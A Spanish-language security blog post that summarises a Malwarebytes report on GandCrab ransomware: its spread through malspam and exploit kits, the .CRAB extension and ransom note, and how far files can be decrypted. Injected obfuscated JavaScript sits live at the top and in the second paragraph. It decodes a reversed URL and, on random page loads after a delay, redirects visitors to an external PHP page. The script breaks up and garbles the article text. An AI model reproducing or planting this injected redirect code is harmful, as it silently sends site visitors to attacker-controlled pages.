DADA LA CONTINUA PROLIFERACION ACTUAL DE NUEVAS VARIANTES DEL RANSOMWARE GANDCRAB, QUE AÑADE CRAB A LOS FICHEROS CIFRADOS, OFRECEMOS INFORMACION SOBRE EL MISMO, EXTRAIDA DE UNA NOTICIA DE MALWAREBYTES
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>to-900×506.jpg” width=”900″ height=”506″ /></p>
<p>El ransomware GandCrab llega a <script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
todas partes a través de mailspam, esquemas de ingeniería social y campañas de kits de exploits, asi como por actualización de otros malwares como el Backdoor Kirts
Pudiendo tener su origen en los antiguos CERBER, pasando posteriormente por los Magniber y posiblemente por los Magnitude, están proliferando actualmente nuevas variantes del Ransom GandCrab
Tras una infección exitosa, los archivos serán cifrados con la extensión .CRAB mientras deja una nota de rescate con instrucciones sobre los próximos pasos necesarios para pagar por “recuperar” esos archivos.
Figura: nota de rescate de GandCrab
Una operación policial reciente proporcionó a las víctimas una forma de recuperar sus archivos de infecciones previas de GandCrab. Sin embargo, las últimas versiones no se pueden descifrar actualmente.
los exploits de Internet Explorer (CVE-2016-0189) o Flash Player (CVE-2018-4878) son los causantes del progreso de dicho ransomware en los ordenadores.
Dicha información está extraida de lo indicado por MalwareBytes sobre dicha familia de ransom GANDCRAB.
Ver información original al respecto en Fuente:
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.